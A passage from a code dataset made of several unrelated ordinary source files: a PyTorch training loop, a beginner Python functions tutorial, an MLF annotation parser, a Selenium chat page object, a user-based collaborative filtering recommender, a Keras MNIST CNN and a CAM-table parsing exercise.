list(self.model.named_parameters())\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n\n optimizer_grouped_parameters = [\n {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': cfg.TRAIN.weight_decay_factor},\n {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n\n if 'Adamw' in cfg.TRAIN.opt:\n\n self.optimizer = torch.optim.AdamW(self.model.parameters(),\n lr=self.init_lr,eps=1.e-5)\n else:\n self.optimizer = torch.optim.SGD(self.model.parameters(),\n lr=0.001,\n momentum=0.9)\n\n if cfg.TRAIN.SWA>0:\n ##use swa\n self.optimizer = SWA(self.optimizer)\n\n if cfg.TRAIN.mix_precision:\n self.model, self.optimizer = amp.initialize( self.model, self.optimizer, opt_level=\"O1\")\n\n\n self.ema = EMA(self.model, 0.999)\n\n self.ema.register()\n ###control vars\n self.iter_num=0\n\n self.train_ds=train_ds\n\n self.val_ds = val_ds\n\n # self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizer,mode='max', patience=3,verbose=True)\n self.scheduler = torch.optim.lr_scheduler.CosineAnnealingLR( self.optimizer, self.epochs,eta_min=1.e-6)\n\n self.criterion = nn.BCEWithLogitsLoss().to(self.device)\n\n\n def custom_loop(self):\n \"\"\"Custom training and testing loop.\n Args:\n train_dist_dataset: Training dataset created using strategy.\n test_dist_dataset: Testing dataset created using strategy.\n strategy: Distribution strategy.\n Returns:\n train_loss, train_accuracy, test_loss, test_accuracy\n \"\"\"\n\n def distributed_train_epoch(epoch_num):\n\n summary_loss = AverageMeter()\n acc_score= ACCMeter()\n self.model.train()\n\n if cfg.MODEL.freeze_bn:\n for m in self.model.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n if cfg.MODEL.freeze_bn_affine:\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n for step in range(self.train_ds.size):\n\n if epoch_num<10:\n ###excute warm up in the first epoch\n if self.warup_step>0:\n if self.iter_num < self.warup_step:\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = self.iter_num / float(self.warup_step) * self.init_lr\n lr = param_group['lr']\n\n logger.info('warm up with learning rate: [%f]' % (lr))\n\n start=time.time()\n\n images,data, target = self.train_ds()\n images = torch.from_numpy(images).to(self.device).float()\n data = torch.from_numpy(data).to(self.device).float()\n target = torch.from_numpy(target).to(self.device).float()\n\n batch_size = data.shape[0]\n\n output = self.model(images,data)\n\n current_loss = self.criterion(output, target)\n\n summary_loss.update(current_loss.detach().item(), batch_size)\n acc_score.update(target,output)\n self.optimizer.zero_grad()\n\n if cfg.TRAIN.mix_precision:\n with amp.scale_loss(current_loss, self.optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n current_loss.backward()\n\n self.optimizer.step()\n if cfg.MODEL.ema:\n self.ema.update()\n self.iter_num+=1\n time_cost_per_batch=time.time()-start\n\n images_per_sec=cfg.TRAIN.batch_size/time_cost_per_batch\n\n\n if self.iter_num%cfg.TRAIN.log_interval==0:\n\n log_message = '[fold %d], '\\\n 'Train Step %d, ' \\\n 'summary_loss: %.6f, ' \\\n 'accuracy: %.6f, ' \\\n 'time: %.6f, '\\\n 'speed %d images/persec'% (\n self.fold,\n step,\n summary_loss.avg,\n acc_score.avg,\n time.time() - start,\n images_per_sec)\n logger.info(log_message)\n\n\n\n if cfg.TRAIN.SWA>0 and epoch_num>=cfg.TRAIN.SWA:\n self.optimizer.update_swa()\n\n return summary_loss,acc_score\n def 
distributed_test_epoch(epoch_num):\n            summary_loss = AverageMeter()\n            acc_score= ACCMeter()\n\n            self.model.eval()\n            t = time.time()\n            with torch.no_grad():\n                for step in range(self.val_ds.size):\n                    images, data, target = self.val_ds()\n                    images = torch.from_numpy(images).to(self.device).float()\n                    data = torch.from_numpy(data).to(self.device).float()\n                    target = torch.from_numpy(target).to(self.device).float()\n                    batch_size = data.shape[0]\n\n\n                    output = self.model(images,data)\n                    loss = self.criterion(output, target)\n\n                    summary_loss.update(loss.detach().item(), batch_size)\n                    acc_score.update(target, output)\n\n\n\n                    if step % cfg.TRAIN.log_interval == 0:\n\n                        log_message = '[fold %d], '\\\n                                      'Val Step %d, ' \\\n                                      'summary_loss: %.6f, ' \\\n                                      'acc: %.6f, ' \\\n                                      'time: %.6f' % (\n                            self.fold,step, summary_loss.avg, acc_score.avg, time.time() - t)\n\n                        logger.info(log_message)\n\n\n            return summary_loss,acc_score\n\n        for epoch in range(self.epochs):\n\n            for param_group in self.optimizer.param_groups:\n                lr=param_group['lr']\n            logger.info('learning rate: [%f]' %(lr))\n            t=time.time()\n\n            summary_loss,acc_score = distributed_train_epoch(epoch)\n\n            train_epoch_log_message = '[fold %d], '\\\n                                      '[RESULT]: Train. Epoch: %d,' \\\n                                      ' summary_loss: %.5f,' \\\n                                      ' accuracy: %.5f,' \\\n                                      ' time:%.5f' % (\n                self.fold,epoch, summary_loss.avg,acc_score.avg, (time.time() - t))\n            logger.info(train_epoch_log_message)\n\n            if cfg.TRAIN.SWA > 0 and epoch >=cfg.TRAIN.SWA:\n\n                ###switch to avg model\n                self.optimizer.swap_swa_sgd()\n\n\n            ## switch to ema weights\n            if cfg.MODEL.ema:\n                self.ema.apply_shadow()\n\n            if epoch%cfg.TRAIN.test_interval==0:\n\n                summary_loss,acc_score = distributed_test_epoch(epoch)\n\n                val_epoch_log_message = '[fold %d], '\\\n                                        '[RESULT]: VAL. Epoch: %d,' \\\n                                        ' summary_loss: %.5f,' \\\n                                        ' accuracy: %.5f,' \\\n                                        ' time:%.5f' % (\n                    self.fold,epoch, summary_loss.avg,acc_score.avg, (time.time() - t))\n                logger.info(val_epoch_log_message)\n\n            self.scheduler.step()\n            # self.scheduler.step(final_scores.avg)\n\n\n\n            #### save model\n            if not os.access(cfg.MODEL.model_path, os.F_OK):\n                os.mkdir(cfg.MODEL.model_path)\n            ###save the best auc model\n\n            #### save the model every end of epoch\n            current_model_saved_name='./models/fold%d_epoch_%d_val_loss%.6f.pth'%(self.fold,epoch,summary_loss.avg)\n\n            logger.info('A model saved to %s' % current_model_saved_name)\n            torch.save(self.model.state_dict(),current_model_saved_name)\n\n            ####switch back\n            if cfg.MODEL.ema:\n                self.ema.restore()\n\n\n            # save_checkpoint({\n            #     'state_dict': self.model.state_dict(),\n            # },iters=epoch,tag=current_model_saved_name)\n\n            if cfg.TRAIN.SWA > 0 and epoch > cfg.TRAIN.SWA:\n                ###switch back to plain model to train next epoch\n                self.optimizer.swap_swa_sgd()\n\n\n\n\n    def load_weight(self):\n        if cfg.MODEL.pretrained_model is not None:\n            state_dict=torch.load(cfg.MODEL.pretrained_model, map_location=self.device)\n            self.model.load_state_dict(state_dict,strict=False)\n\n\n\n","sub_path":"net_work.py","file_name":"net_work.py","file_ext":"py","file_size_in_byte":9518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"608601835","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # User Defined Function\n# \n# * To create a function, use the def keyword followed by the function name, parentheses and a colon\n# \n# * Define the function body with indentation\n# \n# ### Example\n\n# In[1]:\n\n\ndef square(x):\n    return(x**2)\nprint(square(9))\n\n\n# ## Positional Arguments\n# \n# ### Example\n\n# In[2]:\n\n\n\ndef square(*a):\n    
print(format(a))\nsquare(1,2)\nsquare(1,2,3)\nsquare(1,2,3,4)\n\n\n# ## Recursive Function\n# \n# * In Python, we know that a function can call other functions. \n# * It is even possible for the function to call itself. These types of construct are termed as recursive functions.\n# \n# ### Example\n\n# In[3]:\n\n\ndef factorial(x):\n if x == 1:\n return 1\n else:\n return (x * factorial(x-1))\n\n\nnum = 3\nprint(\"The factorial of\", num, \"is\", factorial(num))\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"_build/jupyter_execute/usr.py","file_name":"usr.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"20811005","text":"#!/usr/bin/env python3\r\n# coding: utf-8\r\n\r\n\"\"\" Helper package for operations on MLF files.\r\nPiotr Zelasko @ AGH 2015\r\n\"\"\"\r\n\r\nimport re\r\n\r\nclass MlfAnnotation(object):\r\n def __init__(self, start_time=0, end_time=0, word='', comment=None):\r\n self.start_time = start_time\r\n self.end_time = end_time\r\n self.word = word\r\n self.comment = comment\r\n\r\n def __str__(self):\r\n return str(self.start_time) + \" \" + str(self.end_time) + \" \" + self.word + (\"# {0}\".format(self.comment) if self.comment else \"\")\r\n\r\n def __bool__(self):\r\n if self.start_time < self.end_time and self.word:\r\n return True\r\n return False\r\n __nonzero__ = __bool__ # python2 compatibility\r\n\r\n @staticmethod\r\n def from_string(line_str):\r\n # check for comment\r\n try:\r\n data, comment = line_str.split('#', 1) # strip comment\r\n comment = comment.strip()\r\n except ValueError:\r\n data = line_str\r\n comment = None\r\n pass\r\n\r\n try:\r\n data = data.split(' ') # split to 'start', 'end' and 'word'\r\n return MlfAnnotation(int(data[0]), int(data[1]), data[2], comment)\r\n except ValueError:\r\n return None\r\n\r\n @staticmethod\r\n def merge_annotations(annotations):\r\n new_start_time = annotations[0].start_time\r\n new_end_time = annotations[-1].end_time\r\n new_word = '_'.join([annot.word for annot in annotations])\r\n return MlfAnnotation(new_start_time, new_end_time, new_word)\r\n\r\n def repair(self):\r\n # ensure underscore correctness and remove all non-letter and non-digit annotations\r\n contains_any_alphanumeric = lambda x: re.search('[0-9a-zA-ZąęóżźćńśłĄĘÓŻŹŚŃŁĆ]', x) is not None\r\n self.word = \"_\".join(w for w in self.word.split(\"_\") if w and contains_any_alphanumeric(w))\r\n\r\n _conf_regex = re.compile(\"confidence:([\\-\\d\\.\\d]+)\")\r\n def confidence(self):\r\n try:\r\n match = self._conf_regex.match(self.comment)\r\n if match:\r\n return float(match.group(0))\r\n except ValueError:\r\n return None\r\n\r\n\r\nclass Mlf(object):\r\n def __init__(self, input_path=None):\r\n # initialize\r\n self.wavs = {}\r\n if not input_path:\r\n return # empty Mlf object\r\n\r\n # load mlf\r\n self.path = input_path\r\n lines = [line.strip() for line in open(input_path, mode='r', encoding='utf8')]\r\n\r\n # check header\r\n if \"MLF\" not in lines.pop(0): raise ValueError(\"Invalid MLF header!\")\r\n\r\n # parse file\r\n current_wav = \"\"\r\n for line in lines:\r\n\r\n # discard empty lines and comments\r\n if not line.strip() or line.startswith(\"#\"):\r\n continue\r\n\r\n # new wav indicator\r\n if line.startswith('\"'):\r\n # strip the double quotation characters and convert slashes to unix-style\r\n current_wav = line[1:-1].replace(\"\\\\\", \"/\")\r\n self.wavs[current_wav] = []\r\n continue\r\n\r\n # end of wav indicator\r\n if 
line.startswith(\".\"):\r\n current_wav = \"\"\r\n continue\r\n\r\n # no condition triggered so far - line must contain annotation\r\n self.wavs[current_wav].append(MlfAnnotation.from_string(line))\r\n\r\n def save(self, output_path=None):\r\n # if no path is supplied, overwrite original mlf\r\n if not output_path:\r\n output_path = self.path\r\n\r\n # perform save\r\n with open(output_path, 'w', encoding=\"utf8\") as output:\r\n\r\n # write header\r\n output.write(\"#!MLF!#\\n\")\r\n\r\n # write each wave file\r\n for wav_name in sorted(self.wavs):\r\n\r\n # if this wave has no annotations, skip it\r\n if not self.wavs[wav_name] or all(annot is None for annot in self.wavs[wav_name]): continue\r\n\r\n # if necessary, add double quotations to path to wave\r\n formatted_wav_name = wav_name\r\n if formatted_wav_name[0] != \"\\\"\": formatted_wav_name = \"\\\"\" + formatted_wav_name\r\n if formatted_wav_name[-1] != \"\\\"\": formatted_wav_name += \"\\\"\"\r\n\r\n # write path to wave\r\n output.write(formatted_wav_name + \"\\n\")\r\n\r\n # write each annotation\r\n for annot in self.wavs[wav_name]:\r\n if not annot: continue # skip empty annotations\r\n output.write(str(annot) + \"\\n\")\r\n\r\n # write end of wave file symbol\r\n output.write(\".\" + \"\\n\")\r\n\r\n def items(self):\r\n return self.wavs.items()\r\n\r\n def all_phrases(self):\r\n phr = set()\r\n for wav in self.wavs:\r\n for annot in self.wavs[wav]:\r\n phr.add(annot.word)\r\n return phr\r\n\r\n def __bool__(self):\r\n if len(self.wavs):\r\n return True\r\n return False\r\n\r\n __nonzero__ = __bool__ # python2 compatibility\r\n\r\n @staticmethod\r\n def MLF_TIME_TO_MS_FACTOR():\r\n return 10000.0\r\n\r\n\r\ndef ms_to_mlf_time(time_in_ms):\r\n return int(Mlf.MLF_TIME_TO_MS_FACTOR() * time_in_ms)\r\n\r\n\r\ndef mlf_time_to_ms(time_in_mlf):\r\n return time_in_mlf // Mlf.MLF_TIME_TO_MS_FACTOR()\r\n","sub_path":"s5/local/agh-conv/mlf.py","file_name":"mlf.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"421211148","text":"from os import walk\nimport json\nfrom matching_nlp import cosine_sim\nimport csv\nimport sys\n\nlower = int(sys.argv[1])\nupper = int(sys.argv[2])\n\n# filenames stored on disk\nstored_names = []\nmypath = './../Input/'\nfor (_, _, filenames) in walk(mypath):\n stored_names.extend(filenames)\n break\n\n# file names on mapping file\nvideo_map = {}\nwith open('video_map_'+str(lower)+'_'+str(upper), 'r') as myfile:\n for _, line in enumerate(myfile):\n line = line.split('\\n')[0]\n v_id = int(line.split(',')[0])\n v_name = line.split(',')[1]\n video_map[v_id] = v_name\n\n# start time and end time on json\nf = './../msr-vtt/2017/train_2017/videodatainfo_2017.json'\nwith open(f) as myfile:\n data = json.load(myfile)\nvideos = data.get('videos')\nmetadata = {}\nfor v in videos:\n v_id = int(v.get('id'))\n s_time = float(v.get('start time'))\n e_time = float(v.get('end time'))\n metadata[v_id] = [s_time, e_time]\n\n# list of missing videos\nmissing_id = []\nwith open('missing_video_'+str(lower)+'_'+str(upper), 'r') as myfile:\n for _, line in enumerate(myfile):\n missing_id.append(int(line.split('\\n')[0]))\n\n\nchecked = []\ncnt = 1\nfor v_id in range(lower, upper):\n if v_id in missing_id:\n continue\n temp_name = video_map.get(v_id)\n v_name = max(stored_names, key=lambda x: cosine_sim(x, temp_name))\n row = [v_id] + metadata.get(v_id) + [v_name]\n checked.append(row)\n if cnt % 10 == 0:\n print(cnt)\n else:\n 
print('.', end='', flush=True)\n cnt += 1\n\nprint(len(checked))\nwith open('checked_'+str(lower)+'_'+str(upper), 'a') as myfile:\n writer = csv.writer(myfile)\n writer.writerows(checked)\n","sub_path":"Scripts/check_2.py","file_name":"check_2.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"375466157","text":"from selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom components.base_component import BaseComponent\n\n\nclass ChatDialogLocators:\n def __init__(self):\n self.root = '//div[@id=\"singleChat\"]'\n self.name = '//div[@class=\"dialogue-name dialogue-name_chat\"]'\n self.sendButton = '//div[@id=\"sendMessageBtn\"]'\n self.textArea = '//textarea[@id=\"sendMessage\"]'\n self.msgs = '//div[@class=\"single-message__body\"]'\n\n\nclass ChatDialog(BaseComponent):\n def __init__(self, driver):\n super(ChatDialog, self).__init__(driver)\n\n self.wait = WebDriverWait(self.driver, 20)\n self.locators = ChatDialogLocators()\n\n def get_chat_name(self) -> str:\n element = self.wait.until(\n EC.visibility_of_element_located((By.XPATH, self.locators.name)))\n return element.get_attribute('innerText')\n\n def click_send(self, text:str):\n elementText = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, self.locators.textArea)))\n elementText.send_keys(text)\n\n elementBtn = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, self.locators.sendButton)))\n elementBtn.click()\n\n def click_send_by_enter(self, text: str):\n elementText = self.wait.until(\n EC.element_to_be_clickable((By.XPATH, self.locators.textArea)))\n elementText.send_keys(text)\n elementText.send_keys(u'\\ue007')\n\n def get_last_msg(self) -> str:\n elementStr = self.wait.until(\n EC.presence_of_all_elements_located((By.XPATH, self.locators.msgs)))\n\n return elementStr[len(elementStr) - 1].get_attribute('innerText')\n","sub_path":"components/chat_dialog.py","file_name":"chat_dialog.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"580613391","text":"from kozo import Role, KozoError, NODE_NAME\nfrom kozo.messages import Order\n\nclass PowerController_And(Role):\n\tdef localInit(self):\n\t\tif self['inChannel1'] == self['inChannel2']:\n\t\t\traise KozoError('Both input channels are equal: %s, %s' % (self['inChannel1'], self['inChannel2']))\n\t\tself._state1 = self['initialState1']\n\t\tself._state2 = self['initialState2']\n\tdef isInterestedIn(self, message):\n\t\treturn isinstance(message, Order) and message.getOrderType() == 'powercontrol' and message.getChannel() in (self['inChannel1'], self['inChannel2'])\n\tdef run(self):\n\t\tmessage = self.getMessage(timeout=self['timeout'])\n\t\tif message is not None:\n\t\t\tif message.getChannel() == self['inChannel1']:\n\t\t\t\tself._state1 = message.getOrderData()\n\t\t\telif message.getChannel() == self['inChannel2']:\n\t\t\t\tself._state2 = message.getOrderData()\n\t\tself.sendOrder('powercontrol', channel=self['outChannel'], data=self._state1 and self._state2)\n\nroleInfo = {\n\t'format': '1.0',\n\t'class': PowerController_And,\n\t'author': 'Etienne Perot',\n\t'version': '1.0',\n\t'description': 'AND gate for a PowerController.',\n\t'config': {\n\t\t'outChannel': {\n\t\t\t'description': 'Name of the 
output powercontrol order channel.'\n\t\t},\n\t\t'inChannel1': {\n\t\t\t'description': 'Name of the first powercontrol order channel to subscribe to.'\n\t\t},\n\t\t'inChannel2': {\n\t\t\t'description': 'Name of the second powercontrol order channel to subscribe to.'\n\t\t},\n\t\t'initialState1': {\n\t\t\t'default': False,\n\t\t\t'description': 'Initial value of the first powercontrol order channel prior to receiving any message.'\n\t\t},\n\t\t'initialState2': {\n\t\t\t'default': False,\n\t\t\t'description': 'Initial value of the first powercontrol order channel prior to receiving any message.'\n\t\t},\n\t\t'timeout': {\n\t\t\t'default': 5,\n\t\t\t'description': 'If we do not receive any message in this amount of time, send out an order anyway with the last information.'\n\t\t},\n\t}\n}\n","sub_path":"kozo/roles/powercontroller_and.py","file_name":"powercontroller_and.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"372402775","text":"from operator import itemgetter\n\nimport math\n\nfrom abs.AbsRecommender import AbsRecommender\nfrom aop.LogAop import log\nfrom commen import SplitData, Evaluation\nfrom util import FileUtil\nimport logging\n\n\nclass UserCF(AbsRecommender):\n __rawData = []\n __dataSet = {}\n __trainSet = {}\n __testSet = {}\n __W = {}\n __recResult = {}\n __itemId2UserIds = {}\n\n def __init__(self):\n pass\n\n @log()\n def __initMatrix(self, indexes, initialValue):\n # 初始化矩阵\n w = {}\n for index1 in indexes:\n w[index1] = {}\n for index2 in indexes:\n w[index1][index2] = initialValue\n return w\n\n @log()\n def loadRawData(self, path) -> []:\n # logging.info(\"开始加载原始数据,path = %s\", path)\n # self.__timer.start()\n self.__rawData = FileUtil.readAllLines(path)\n self.__rawData.pop(0) # 删除第一行的title\n # logging.debug(\"原始数据长度:%d,原始数据:%s\", len(self.__rawData), str(self.__rawData))\n # logging.info('加载数据完成,用时:%dms', self.__timer.stop())\n return self.__rawData\n\n @log()\n def generateDataset(self) -> ({str: [()]}, {str: [()]}):\n # logging.info(\"生成dataSet,trainSet,testSet,不考虑评分和时间戳\")\n # self.__timer.start()\n for line in self.__rawData:\n split = line.split(',')\n userId = split[0]\n itemId = split[1]\n self.__dataSet.setdefault(userId, set())\n self.__dataSet[userId].add(itemId)\n # logging.debug(\"dataSet:长度:%d,数据:%s\", len(self.__dataSet), str(self.__dataSet))\n # logging.info(\"dataSet:长度:%d\", len(self.__dataSet))\n # 将每个userId对应的items分割,80%作训练集,20%作测试集\n for userId, itemIds in self.__dataSet.items():\n testSetItems, trainSetItems = SplitData.randomSplitList(list(itemIds), 0.2)\n self.__trainSet[userId] = set(trainSetItems)\n self.__testSet[userId] = set(testSetItems)\n # logging.info(\"trainSet:长度:%d\", len(self.__trainSet))\n # logging.debug(\"trainSet:长度:%d,数据:%s\", len(self.__trainSet), str(self.__trainSet))\n # logging.debug(\"testSet:长度:%d,数据:%s\", len(self.__testSet), str(self.__testSet))\n # logging.info(\"testSet:长度:%d\", len(self.__testSet))\n # logging.info('生成数据集完成,用时:%dms', self.__timer.stop())\n\n @log()\n def calcSimMatrix(self) -> {}:\n \"\"\"\n 计算user相似度矩阵w\n w[u][v]:用户u和v的相似度\n N(u):用户u的物品列表\n N(v):用户v的物品列表\n C[u][v]用户u和v共有的物品数 即 c[u][v] = len(N(u) & N(v))\n 公式:w[u][v] = c[u][v]/sqrt(len(N(u))*len(N(v)))\n \"\"\"\n # logging.info(\"生成用户相似度矩阵\")\n # self.__timer.start()\n # 1.建立item-user倒排表\n itemId2UserIds = {}\n for userId, itemIds in self.__trainSet.items():\n for itemId in itemIds:\n itemId2UserIds.setdefault(itemId, set())\n 
itemId2UserIds[itemId].add(userId)\n # logging.debug('item-user倒排表:%s', str(itemId2UserIds))\n self.__itemId2UserIds = itemId2UserIds\n # 2.计算C[u][v]\n C = self.__initMatrix(self.__trainSet.keys(), 0)\n for itemId, userIds in itemId2UserIds.items():\n for u in userIds:\n for v in userIds:\n C[u][v] += 1\n # logging.debug('C[u][v]:%s', str(C))\n # 3.计算W[u][v]\n self.__W = self.__initMatrix(self.__trainSet.keys(), 0)\n for u in self.__trainSet.keys():\n for v in self.__trainSet.keys():\n self.__W[u][v] = C[u][v] / math.sqrt(len(self.__trainSet[u]) * len(self.__trainSet[v]))\n # logging.debug('W[u][v]:%s:', str(self.__W))\n # logging.info('生成用户相似度矩阵完成,用时:%dms', self.__timer.stop())\n return self.__W\n\n @log()\n def recommendForAllUser(self, K):\n \"\"\"\n 生成训练集上所有用户的推荐列表,计算每个用户和他相邻的K个用户的物品列表中的每个物品的兴趣程度pui\n 公式:p(u,i) = 求和W[u][v]*R[v][i],对所有的v属于S(u,K) & N(i),这里用隐反馈,R[v][i]=1\n :param K: 最相近的K个用户\n :return: 每个用户的推荐结果\n \"\"\"\n # logging.info(\"为所有用户生成推荐\")\n # self.__timer.start()\n for u in self.__trainSet.keys():\n self.__recResult[u] = {}\n for v, wuv in sorted(self.__W[u].items(), key=itemgetter(1), reverse=True)[0:K]:\n for itemId in self.__trainSet[v]:\n if itemId not in self.__trainSet[u]:\n self.__recResult[u].setdefault(itemId, 0.0)\n self.__recResult[u][itemId] += self.__W[u][v]\n\n # logging.info('为所有用户生成推荐完成,用时:%dms', self.__timer.stop())\n # logging.info('用户1的推荐列表%s', sorted(self.__recResult['1'].items(), key=itemgetter(1), reverse=True))\n return self.__recResult\n\n @log()\n def evaluate(self):\n \"\"\"\n 评估推荐效果,ru:为u推荐的itemList,tu:测试集上u的itemList\n \"\"\"\n # logging.info(\"开始评估指标\")\n # self.__timer.start()\n data = []\n allRu = set()\n ruList = []\n for userId, recItems in self.__recResult.items():\n tu = self.__testSet[userId]\n ru = {itemId for itemId, pui in sorted(recItems.items(), key=itemgetter(1), reverse=True)[0:10]}\n ruList.append(ru)\n allRu.update(ru)\n data.append((tu, ru))\n recall = Evaluation.recall(data)\n precision = Evaluation.precision(data)\n\n trainItems = set(self.__itemId2UserIds.keys())\n coverage = Evaluation.coverage(allRu, trainItems)\n\n popularity = Evaluation.popularity(self.__trainSet, ruList)\n\n # logging.info('评估指标完成,用时:%dms', self.__timer.stop())\n # logging.info('召回率:%.2f%%', recall * 100)\n # logging.info('准确率:%.2f%%', precision * 100)\n # logging.info('覆盖率:%.2f%%', coverage * 100)\n # logging.info('流行度:%.2f', popularity)\n return recall, precision,coverage,popularity\n","sub_path":"chapter2/UserCF.py","file_name":"UserCF.py","file_ext":"py","file_size_in_byte":6437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"2331479","text":"import tensorflow as tf\nfrom tensorflow.keras import layers, models\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.python.keras.layers.core import Flatten\nfrom tensorflow.python.keras.layers.normalization import BatchNormalization\nfrom keras.optimizers import SGD\nfrom keras.utils.np_utils import to_categorical\nfrom sklearn.model_selection import KFold\nfrom matplotlib import pyplot as plt, use\nfrom numpy import mean, std\nfrom tensorflow.keras import initializers\n\ngpus = tf.config.experimental.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(gpus[0], True)\n\nclass Network2:\n\n def __init__(self):\n (self.train_X, self.train_y), (self.test_X, self.test_y) = mnist.load_data() \n self.image_input_layer = layers.InputLayer(input_shape=(28, 28, 1))\n self.convolution2d_layer1 = layers.Conv2D(20, use_bias=True, 
strides=(1,1), activation='relu', padding='same', kernel_size=(3, 3), kernel_initializer=initializers.RandomNormal(stddev=0.01, mean=0, seed=None))\n self.max_pooling2d_layer1 = layers.MaxPooling2D(strides=(2,2), pool_size=(2, 2), padding='valid')\n self.convolution2d_layer2 = layers.Conv2D(30, use_bias=True, strides=(1,1), kernel_size=(3,3), padding='same', activation='relu', kernel_initializer=initializers.RandomNormal(stddev=0.01, mean=0, seed=None))\n self.max_pooling2d_layer2 = layers.MaxPooling2D(strides=(2,2), pool_size=(2,2), padding='valid')\n self.convolution2d_layer3 = layers.Conv2D(50, use_bias=True, strides=(1,1), padding='same', kernel_size=(3,3), activation='relu', kernel_initializer=initializers.RandomNormal(stddev=0.01, mean=0, seed=None))\n self.fully_connected_layer = layers.Dense(10, activation='softmax')\n self.optimizer = SGD(momentum = 0.9, lr=0.01)\n self.history_list = list()\n self.score_list = list()\n\n def define_network(self):\n network2 = models.Sequential()\n network2.add(self.image_input_layer)\n network2.add(self.convolution2d_layer1)\n #network2.add(BatchNormalization())\n network2.add(self.max_pooling2d_layer1)\n network2.add(self.convolution2d_layer2)\n #network2.add(BatchNormalization())\n network2.add(self.max_pooling2d_layer2)\n network2.add(self.convolution2d_layer3)\n #network2.add(BatchNormalization())\n network2.add(Flatten())\n network2.add(self.fully_connected_layer)\n network2.compile(metrics=['accuracy'], loss='categorical_crossentropy', optimizer=self.optimizer)\n return network2\n \n def summary(self):\n print(self.network2.summary())\n\n def load_mnist(self):\n training_shape = (self.train_X.shape[0], 28, 28, 1) # Single channel shape\n testing_shape = (self.test_X.shape[0], 28, 28, 1)\n self.train_X = self.train_X.reshape(training_shape)\n self.test_X = self.test_X.reshape(testing_shape)\n self.train_y = to_categorical(self.train_y)\n self.test_y = to_categorical(self.test_y)\n\n def eval(self):\n\n cross_validator = KFold(10, random_state=1, shuffle=True)\n \n for i, j in cross_validator.split(self.train_X):\n net = self.define_network()\n train_X = self.train_X[i]\n train_y = self.train_y[i]\n test_X = self.train_X[j]\n test_y = self.train_y[j]\n history = net.fit(train_X, train_y, validation_data = (test_X, test_y), epochs = 30, batch_size = 4096, verbose = 1)\n _, accuracy = net.evaluate(test_X, test_y, verbose=0)\n print(\"\\nAccuracy = \" + str(100 * accuracy))\n self.score_list.append(accuracy)\n self.history_list.append(history)\n\n def information(self):\n for i in range(len(self.history_list)):\n\n plt.subplot(2, 1, 1)\n plt.title('Loss')\n plt.xlabel('Epochs')\n plt.plot(self.history_list[i].history['loss'], color='orange', label='Training data')\n plt.plot(self.history_list[i].history['val_loss'], color='blue', label ='Testing data')\n \n plt.subplot(2, 1, 2)\n plt.title('Accuracy')\n plt.xlabel('Epochs')\n plt.plot(self.history_list[i].history['accuracy'], color='orange', label='Training data')\n plt.plot(self.history_list[i].history['val_accuracy'], color='blue', label ='Testing data')\n\n plt.legend()\n \n plt.show()\n\n print('Mean accuracy: ' + str(100 * mean(self.score_list)))\n print(\"Std accuracy: \" + str(std(self.score_list)))\n print(\"n = \" + str(len(self.score_list)))\n\n def pixel_scaling(self):\n\n train = self.train_X.astype('float32')\n test = self.test_X.astype('float32')\n\n self.train_X = train / 255.0\n self.test_X = test / 255.0\n\n\ndef main():\n net = Network2()\n net.load_mnist()\n 
net.pixel_scaling()\n    net.eval()\n    net.information()\n\nmain()","sub_path":"ANNHW3/ConvolutionalNetwork2.py","file_name":"ConvolutionalNetwork2.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"646946817","text":"#!/usr/bin/env python3\n\"\"\"\nThe script must process the records in the CAM_table.txt file so that:\n\n    only lines that contain MAC addresses are read\n    every line with a MAC address is processed so that a table of the following form is written to standard output:\n\n    100     01bb.c580.7000      Gi0/1\n    200     0a4b.c380.7010      Gi0/2\n    300     a2ab.c5a0.2000      Gi0/3\n    100     0a1b.1c80.7300      Gi0/4\n    500     02b1.3c80.7000      Gi0/5\n    200     1a4b.c580.5000      Gi0/6\n    300     0a1b.5c80.9010      Gi0/7\n----\nExtend the script:\n    Sort the output by VLAN number\n----\nExtend the script:\n    Ask the user to enter a VLAN number.\n    Print information only for the given VLAN.\n\n\"\"\"\n#\nsymb='Gi'\ntable=[]\nvlan_num_list=[]\n\nwith open ('CAM_table.txt', 'r') as cam_table:\n    for line in cam_table:\n        if symb in line:\n            table.append(line.strip().split())\n\ntable.sort()\n\nfor i in range(len(table)):\n    vlan_num_list.append(table[i][0])\n\nvlan_num_list = set(vlan_num_list)\nvlan_num_list = list(vlan_num_list)\nvlan_num_list.sort()\n\nprint('Enter a VLAN number from the list', str(vlan_num_list), ':', end='')\nvlan = input()\n\nfor i in range(len(table)):\n    if table[i][0] == vlan:\n        print(' 